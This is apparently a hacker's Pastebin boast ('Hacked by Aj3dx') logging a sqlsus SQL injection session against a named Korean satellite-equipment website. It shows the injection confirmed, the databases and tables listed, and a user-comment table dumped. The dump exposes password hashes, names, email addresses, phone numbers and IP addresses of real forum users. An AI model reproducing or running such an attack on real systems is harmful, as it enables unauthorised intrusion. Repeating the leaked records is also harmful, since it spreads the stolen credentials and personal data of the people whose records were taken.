Advertisement
Guest User

Untitled

a guest
Apr 10th, 2015
408
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Hacked by Aj3dx
  2. Anonymous IAG TEAM
  3.  
  4. Satellite:
  5.  
  6. ┌─[root@parrot]─[/home/aj3dx]
  7. └──╼ #sqlsus -g vuln.conf
  8.  
  9. sqlsus version 0.7.2
  10.  
  11. Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
  12.  
  13. vuln.conf already exists, overwrite ? [y|n] ? y
  14. [+] Configuration successfully saved to vuln.conf
  15. ┌─[root@parrot]─[/home/aj3dx]
  16. └──╼ #nano vuln.conf
  17. ┌─[root@parrot]─[/home/aj3dx]
  18. └──╼ #sqlsus vuln.conf
  19.  
  20. sqlsus version 0.7.2
  21.  
  22. Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
  23.  
  24. [+] Session "eng.sekisat.com" created
  25. sqlsus> start
  26. [+] Correct number of columns for UNION : 9 (1,1,1,1,1,1,1,0,0)
  27. [+] Length restriction on URL : 8199 bytes
  28. [+] Filling %target...
  29. +----------+-----------------------------+
  30. | Variable | Value |
  31. +----------+-----------------------------+
  32. | database | SEKIsekisat |
  33. | user | 'sekisat'@'localhost' |
  34. | version | 5.5.31-0ubuntu0.12.04.1-log |
  35. +----------+-----------------------------+
  36. 3 rows in set
  37.  
  38. sqlsus> get database
  39.  
  40. Usage : get <item>
  41.  
  42. This command retrieves information from MySQL system tables (information_schema.*).
  43. Note that it will only work on MySQL >= 5. Otherwise, see "brute".
  44.  
  45. Possible items :
  46. tables : get the names of the tables of the current database (as per "set")
  47. columns [table_name] : get the names of the columns [for the given table]
  48. count [table_name] : get the count(*) for each table [or the given table]
  49. db : same as get tables + columns + count
  50. privs : get the privileges for the user
  51. databases : get the names of all the databases
  52.  
  53. sqlsus> get databases
  54. [+] Getting databases names
  55. +---------------+
  56. | Databases |
  57. +---------------+
  58. | SEKIsekisat |
  59. | SEKIBBS |
  60. | SEKIWooJin |
  61. | SEKIcounter |
  62. | SEKIcustomer |
  63. | SEKIgnu4 |
  64. | SEKIip_class |
  65. | SEKIiskylife |
  66. | SEKIproduct |
  67. | SEKIsatellite |
  68. | SEKIshop |
  69. | SEKIstock |
  70. | SEKIzipcode |
  71. +---------------+
  72. 13 rows in set
  73.  
  74. sqlsus> get tables
  75. [+] Getting tables names
  76.  
  77. <( SEKIsekisat )>
  78.  
  79. [basket]
  80.  
  81.  
  82. [board_benchmark]
  83.  
  84.  
  85. [board_category]
  86.  
  87.  
  88. [board_comment]
  89.  
  90.  
  91. [board_digital]
  92.  
  93.  
  94. [board_forum_eng]
  95.  
  96.  
  97. [board_free_broadcasting]
  98.  
  99.  
  100. [board_group]
  101.  
  102.  
  103. [board_pds]
  104.  
  105.  
  106. [board_pds_eng]
  107.  
  108.  
  109. [board_satellite_index]
  110.  
  111.  
  112. [board_satellite_pds]
  113.  
  114.  
  115. [board_service]
  116.  
  117.  
  118. [board_service_eng]
  119.  
  120.  
  121. [board_service_secret]
  122.  
  123.  
  124. [board_setup]
  125.  
  126.  
  127. [company]
  128.  
  129.  
  130. [company22]
  131.  
  132.  
  133. [company_category]
  134.  
  135.  
  136. [company_category22]
  137.  
  138.  
  139. [construction_history]
  140.  
  141.  
  142. [counter_200705]
  143.  
  144.  
  145. [counter_200708]
  146.  
  147.  
  148. [counter_200710]
  149.  
  150.  
  151. [counter_200711]
  152.  
  153.  
  154. [counter_200901]
  155.  
  156.  
  157. [counter_pageview_200704]
  158.  
  159.  
  160. [counter_pageview_200705]
  161.  
  162.  
  163. [counter_pageview_200707]
  164.  
  165.  
  166. [counter_pageview_200708]
  167.  
  168.  
  169. [counter_pageview_200710]
  170.  
  171.  
  172. [counter_pageview_200711]
  173.  
  174.  
  175. [counter_pageview_200712]
  176.  
  177.  
  178. [counter_pageview_200802]
  179.  
  180.  
  181. [counter_pageview_200804]
  182.  
  183.  
  184. [counter_pageview_200805]
  185.  
  186.  
  187. [counter_pageview_200806]
  188.  
  189.  
  190. [counter_pageview_200809]
  191.  
  192.  
  193. [counter_pageview_200901]
  194.  
  195.  
  196. [counter_pageview_200908]
  197.  
  198.  
  199. [employ_applicant]
  200.  
  201.  
  202. [employ_notice]
  203.  
  204.  
  205. [fieldselectdefine]
  206.  
  207.  
  208. [focus]
  209.  
  210.  
  211. [gallery_installation_photo_eng]
  212.  
  213.  
  214. [gallery_satellite]
  215.  
  216.  
  217. [gallery_satellite_photo_eng]
  218.  
  219.  
  220. [gallery_sky_satellite]
  221.  
  222.  
  223. [gallery_user_photo_eng]
  224.  
  225.  
  226. [gallery_user_satellite]
  227.  
  228.  
  229. [package]
  230.  
  231.  
  232. [sat_channel]
  233.  
  234.  
  235. [sat_channel_category]
  236.  
  237.  
  238. [sat_channel_set]
  239.  
  240.  
  241. [sat_channel_set_change]
  242.  
  243.  
  244. [sat_language_category]
  245.  
  246.  
  247. [sat_products]
  248.  
  249.  
  250. [sat_relay]
  251.  
  252.  
  253. [sat_relay_change]
  254.  
  255.  
  256. [sat_satellite]
  257.  
  258.  
  259. [sat_state_category]
  260.  
  261.  
  262. [satellite_photo]
  263.  
  264.  
  265. [service_news]
  266.  
  267.  
  268. [service_news_eng]
  269.  
  270.  
  271. [service_notice]
  272.  
  273.  
  274. [service_notice_eng]
  275.  
  276.  
  277. [service_user_market]
  278.  
  279.  
  280. [service_user_market_comment]
  281.  
  282.  
  283. [sky_satellite_photo]
  284.  
  285. Possible items :
  286. tables : get the names of the tables of the current database (as per "set")
  287. columns [table_name] : get the names of the columns [for the given table]
  288. count [table_name] : get the count(*) for each table [or the given table]
  289. db : same as get tables + columns + count
  290. privs : get the privileges for the user
  291. databases : get the names of all the databases
  292.  
  293. sqlsus> get columns sat_channel_set_change
  294. [+] Getting columns names for SEKIsekisat.sat_channel_set_change
  295. +-----------------------------------+
  296. | Columns in sat_channel_set_change |
  297. +-----------------------------------+
  298. | no |
  299. | channel_set_no |
  300. | satellite_no |
  301. | relay_no |
  302. | channel_no |
  303. | video_format |
  304. | audio_format |
  305. | resolution |
  306. | encryption |
  307. | free_mode |
  308. | video_id |
  309. | audio_id |
  310. | audio_analog |
  311. | pcr |
  312. | members_id |
  313. | regdate |
  314. +-----------------------------------+
  315. 16 rows in set
  316.  
  317. sqlsus> get columns service_user_market_comment
  318. [+] Getting columns names for SEKIsekisat.service_user_market_comment
  319. +----------------------------------------+
  320. | Columns in service_user_market_comment |
  321. +----------------------------------------+
  322. | no |
  323. | views |
  324. | parent_no |
  325. | members_id |
  326. | writer |
  327. | passwd |
  328. | comment |
  329. | ip |
  330. | count |
  331. | regdate |
  332. +----------------------------------------+
  333. 10 rows in set
  334.  
  335. sqlsus> selct * from service_user_market_comment
  336. "selct * from service_user_market_comment" command not implemented
  337. sqlsus> select * from service_user_market_comment
  338. +----+-------+-----------+------------+------------------+-------------------------------------------+-----------------------------------------------------------------------------------------------------------------------+----------------+-------+---------------------+
  339. | no | views | parent_no | members_id | writer | passwd | comment | ip | count | regdate |
  340. +----+-------+-----------+------------+------------------+-------------------------------------------+-----------------------------------------------------------------------------------------------------------------------+----------------+-------+---------------------+
  341. | 5 | 1 | 18 | | 폴 | *FB6B86FECF96ACD45F41F1C59ADEB0D4CDC7E1B6 | 저두 중고위성 안테나 연락부탁드립니다.
  342. 어떤 사이즈든 알려주세요. 시골집에 설치하려구 합니다.
  343. 이왕 수신기도 있으면 알려주세요
  344. yoobie@kornet.net 감사합니다.| 122.32.127.154 | 0 | 2007-04-14 02:43:34 |
  345. | 6 | 1 | 23 | lg2077 | 박일중 | *4427A478701D500C10CE01117DB5C919341DD826 | 중고 위성게측기 삽니다 텔래만이나 주다가 제품 무궁화 5호 만 잡으면 됨니다 011528-4277| 220.94.80.172 | 0 | 2007-07-19 18:50:48 |
  346. | 7 | 1 | 27 | JuddyCrom | 박철 | *B4ED24274654A59A9D0C639C4DA9EBA414B887D8 | 기기 상태와 가능하시면 사진멜로좀 볼수 있나요...
  347. cromwell-1978@hanmail.net
  348. 그리고 판매자 지역... 여긴 대전이라서요| 116.122.199.2 | 0 | 2007-10-21 00:13:55 |
  349. | 8 | 1 | 25 | | 형석 | *AB60BDFD62AC4CDDF053FFEF844479304B455D4A | 신용이없네요 몇개월째올려놓았다 판매약속을 깨는 신용없으신분 | 211.107.28.189 | 0 | 2007-11-15 12:45:22 |
  350. | 10 | 1 | 18 | | ycx8887@sina.com | *C3A68B716F0697CE43706057022B7DDACFB52E72 | 중고위성수신기 사려구요.물론작동은잘되야구요.있으면 알려주세요 | 218.62.88.89 | 0 | 2008-02-28 15:36:59 |
  351. | 13 | 1 | 38 | JuddyCrom | 박철 | *B4ED24274654A59A9D0C639C4DA9EBA414B887D8 | 님께서 예전에 일반위성수신기묶음판매올리시지 않았는지요?
  352. 묶음으로 저렴하게 올려놓으셨던데 혹시 아직 많이 보유하고 계신지?
  353. 016-9890-5828 24시간통화가능합니다. 혹시 있으시면 문자주세요 전화드리지요| 116.122.199.27 | 0 | 2008-10-06 22:59:03 |
  354. | 12 | 1 | 35 | | 조삼형 | *89C6B530AA78695E257E55D63C00A6EC9AD3E977 | 판매완료되었습니다. | 121.88.13.7 | 0 | 2008-04-12 17:22:45 |
  355. | 14 | 1 | 44 | | JuddyCrom | *266E373F0E6A43B644ADCE01403007E5A90F749A | CATV계측기와 텔레만계측기는 판매완료되었습니다.
  356. 현재 다가트론 계측기 모델만 한대 남아있습니다.| 218.50.202.176 | 0 | 2009-04-23 12:21:55 |
  357. | 16 | 1 | 20 | jin1588 | 진종택 | *99A09072ED5C9A37EA9FB76DB6E2BC444748D124 | 지금도물건이있는지?010-6235-1087 | 222.97.17.105 | 0 | 2010-10-20 06:34:36 |
  358. +----+-------+-----------+------------+------------------+-------------------------------------------+-----------------------------------------------------------------------------------------------------------------------+----------------+-------+---------------------+
  359. 9 rows in set (2 hits)
  360.  
  361. sqlsus>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement